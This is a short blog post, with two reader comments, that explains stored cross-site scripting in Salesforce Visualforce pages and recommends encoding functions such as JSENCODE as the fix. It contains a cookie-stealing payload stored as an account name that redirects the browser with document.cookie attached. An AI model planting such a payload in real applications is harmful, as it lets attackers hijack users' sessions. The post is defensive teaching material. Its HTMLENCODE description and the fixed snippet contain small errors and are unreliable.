Salesforce applications with security : Stored XSS


Continuing to my previous post , this time I would to share the knowledge on Stored XSS part.
So Stored XSS is cross site scripting where a attacker can inject his code on to the server pages permanently and these scripts run whenever some action made on the page.

In other words :
“Stored attacks are those where the injected code is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information.”

Let’s have an example:

function crossXSS()
var xssExample = ‘{!Account.Name}’ ;
<apex:commandLink value=”Click me” onClick=”crossXSS();” />


Now suppose
Account Name is :  testName’;1′;document.location=’’%2Bdocument.cookie;var%20foo=’;

So this account name will always be on the page in script block and whenever the commandLink will be clicked “crossXSS” will be called and will be in the following manner:
var xssExample = ‘testName’;1′;document.location=’’%2Bdocument.cookie;var%20foo=’;

So again you can see here all the cookies will be sent to the site.

What I suggested in previous blog , repeating all those things again :).

To prevent from this , salesforce provides some encoding function for the those are available on Visualforce page like :etc.

So the code explained above can be  updated as :
var xssExample = ‘{!JSENCODE(Account.Name})’ ;

So the value fetching from the request parameter will be encoded now.
JSENCODE : To encode the properties in javascript.
HTMLENCODE: To encode the properties in javascript.
JSINHTNLENCODE: If calling a javascript method from HTML component and passing the properties.
URLENCODE:  If building a URL on page.

Please feel free to ask the questions/doubts. Suggestions are appreciated.

4 thoughts on “Salesforce applications with security : Stored XSS”

  1. Hi I am using this to read the parameter.
    Before Passing to URL I Encode the parameter using JSENCODE in the javascript function

    The following line in controller reads the parameter

    String temp = System.currentPageReference().getParameters().get('Amt');
    is there a risk?


  2. Hi Srikanta M,

    There is no risk at all but if you want use this variable in a dynamic query then you need to "escapeSingleQuotes" like String.escapeSingleQuotes(temp) before using in dynamic SOQL.

    Deepak Choudhary

Leave a Reply

Your email address will not be published. Required fields are marked *